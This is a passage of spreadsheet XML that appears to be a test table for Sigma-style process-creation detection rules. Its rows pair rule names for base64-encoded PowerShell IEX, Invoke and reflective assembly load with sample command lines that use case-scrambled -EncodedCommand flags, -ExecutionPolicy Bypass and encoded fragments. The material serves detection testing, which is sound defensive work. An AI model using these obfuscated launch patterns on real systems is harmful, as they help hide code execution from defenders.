        <v>0</v>
      </c>
    </row>
    <row r="376" ht="15.75" customHeight="1" s="42">
      <c r="A376" s="43" t="n"/>
      <c r="B376" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C376" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D376" s="44" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E376" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enCoDeDcOMmanD aQBlAHgAIAAgACAAIAAgACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F376" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G376" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H376" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I376" s="44" t="n"/>
      <c r="J376" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K376" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="377" ht="15.75" customHeight="1" s="42">
      <c r="A377" s="43" t="n"/>
      <c r="B377" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C377" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D377" s="44" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E377" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENcODEdcOmMAND aQBlAHgAIAAgACAAIAAgACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F377" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G377" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H377" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I377" s="44" t="n"/>
      <c r="J377" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K377" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="378" ht="15.75" customHeight="1" s="42">
      <c r="A378" s="43" t="n"/>
      <c r="B378" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C378" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D378" s="44" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E378" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" aQBlAHgAIAAgACAAIAAgACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F378" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G378" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H378" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I378" s="44" t="n"/>
      <c r="J378" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K378" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="379" ht="15.75" customHeight="1" s="42">
      <c r="A379" s="43" t="n"/>
      <c r="B379" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C379" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D379" s="44" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E379" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBgAEUAYABYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F379" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G379" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H379" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I379" s="44" t="n"/>
      <c r="J379" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K379" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="380" ht="15.75" customHeight="1" s="42">
      <c r="A380" s="43" t="n"/>
      <c r="B380" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C380" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D380" s="44" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E380" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncODEdcommANd SQBgAEUAYABYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F380" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G380" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H380" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I380" s="44" t="n"/>
      <c r="J380" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K380" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="381" ht="15.75" customHeight="1" s="42">
      <c r="A381" s="43" t="n"/>
      <c r="B381" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C381" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D381" s="44" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E381" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" SQBgAEUAYABYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F381" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G381" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H381" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I381" s="43" t="n"/>
      <c r="J381" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K381" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="382" ht="15.75" customHeight="1" s="42">
      <c r="A382" s="43" t="n"/>
      <c r="B382" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C382" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D382" s="44" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E382" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBgAEUAYABYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F382" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G382" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H382" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I382" s="44" t="n"/>
      <c r="J382" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K382" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="383" ht="15.75" customHeight="1" s="42">
      <c r="A383" s="43" t="n"/>
      <c r="B383" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C383" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D383" s="44" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E383" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -encodEdCommanD SQBgAEUAYABYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F383" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G383" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H383" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I383" s="43" t="n"/>
      <c r="J383" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K383" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="384" ht="15.75" customHeight="1" s="42">
      <c r="A384" s="43" t="n"/>
      <c r="B384" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C384" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D384" s="44" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E384" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enCodEdcommanD SQBgAEUAYABYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F384" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G384" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H384" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I384" s="43" t="n"/>
      <c r="J384" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K384" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="385" ht="15.75" customHeight="1" s="42">
      <c r="A385" s="43" t="n"/>
      <c r="B385" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C385" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D385" s="44" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E385" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F385" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G385" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H385" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I385" s="44" t="n"/>
      <c r="J385" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K385" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="386" ht="15.75" customHeight="1" s="42">
      <c r="A386" s="43" t="n"/>
      <c r="B386" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C386" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D386" s="44" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E386" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncoDeDCOMmaND SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F386" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G386" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H386" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I386" s="43" t="n"/>
      <c r="J386" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K386" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="387" ht="15.75" customHeight="1" s="42">
      <c r="A387" s="43" t="n"/>
      <c r="B387" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C387" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D387" s="44" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E387" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F387" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G387" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H387" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I387" s="43" t="n"/>
      <c r="J387" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K387" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="388" ht="15.75" customHeight="1" s="42">
      <c r="A388" s="43" t="n"/>
      <c r="B388" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C388" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D388" s="44" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E388" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enCodEDcOmMAnd SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F388" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G388" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H388" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I388" s="43" t="n"/>
      <c r="J388" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K388" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="389" ht="15.75" customHeight="1" s="42">
      <c r="A389" s="43" t="n"/>
      <c r="B389" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C389" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D389" s="44" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E389" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EnCoDeDCommANd SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F389" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G389" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H389" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I389" s="43" t="n"/>
      <c r="J389" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K389" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="390" ht="15.75" customHeight="1" s="42">
      <c r="A390" s="43" t="n"/>
      <c r="B390" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C390" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D390" s="44" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E390" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F390" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G390" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H390" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I390" s="43" t="n"/>
      <c r="J390" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K390" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="391" ht="15.75" customHeight="1" s="42">
      <c r="A391" s="43" t="n"/>
      <c r="B391" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C391" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D391" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E391" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F391" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G391" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H391" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I391" s="43" t="n"/>
      <c r="J391" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K391" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="392" ht="15.75" customHeight="1" s="42">
      <c r="A392" s="43" t="n"/>
      <c r="B392" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C392" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D392" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E392" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EXEcutIonpoliCY Bypass -"e" aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F392" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G392" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H392" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I392" s="43" t="n"/>
      <c r="J392" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K392" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="393" ht="15.75" customHeight="1" s="42">
      <c r="A393" s="43" t="n"/>
      <c r="B393" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C393" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D393" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E393" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -E aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F393" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G393" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H393" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I393" s="43" t="n"/>
      <c r="J393" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K393" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="394" ht="15.75" customHeight="1" s="42">
      <c r="A394" s="43" t="n"/>
      <c r="B394" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C394" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D394" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E394" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExeCutIoNPoLicY Bypass /"e" aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F394" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G394" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H394" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I394" s="43" t="n"/>
      <c r="J394" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K394" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="395" ht="15.75" customHeight="1" s="42">
      <c r="A395" s="43" t="n"/>
      <c r="B395" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C395" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D395" s="44" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E395" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EnCODEdCoMManD WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F395" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G395" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H395" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I395" s="43" t="n"/>
      <c r="J395" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K395" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="396" ht="15.75" customHeight="1" s="42">
      <c r="A396" s="43" t="n"/>
      <c r="B396" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C396" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D396" s="44" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E396" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F396" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G396" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H396" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I396" s="43" t="n"/>
      <c r="J396" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K396" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="397" ht="15.75" customHeight="1" s="42">
      <c r="A397" s="43" t="n"/>
      <c r="B397" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C397" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D397" s="44" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E397" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -encOdEDCommAND WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F397" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G397" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H397" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I397" s="43" t="n"/>
      <c r="J397" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K397" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="398" ht="15.75" customHeight="1" s="42">
      <c r="A398" s="43" t="n"/>
      <c r="B398" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C398" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D398" s="44" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E398" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENcODEDCOmmAnD WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F398" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G398" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H398" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I398" s="43" t="n"/>
      <c r="J398" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K398" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="399" ht="15.75" customHeight="1" s="42">
      <c r="A399" s="43" t="n"/>
      <c r="B399" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C399" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D399" s="44" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E399" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENCodEdCOmMand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F399" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G399" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H399" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I399" s="43" t="n"/>
      <c r="J399" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K399" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="400" ht="15.75" customHeight="1" s="42">
      <c r="A400" s="43" t="n"/>
      <c r="B400" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C400" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D400" s="44" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E400" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EnCoDEDCoMMAND WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F400" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G400" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H400" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I400" s="43" t="n"/>
      <c r="J400" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K400" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="401" ht="15.75" customHeight="1" s="42">
      <c r="A401" s="43" t="n"/>
      <c r="B401" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C401" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D401" s="44" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E401" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -encodedcoMmaNd WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F401" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G401" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H401" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I401" s="43" t="n"/>
      <c r="J401" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K401" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="402" ht="15.75" customHeight="1" s="42">
      <c r="A402" s="43" t="n"/>
      <c r="B402" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C402" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D402" s="44" t="inlineStr">
        <is>
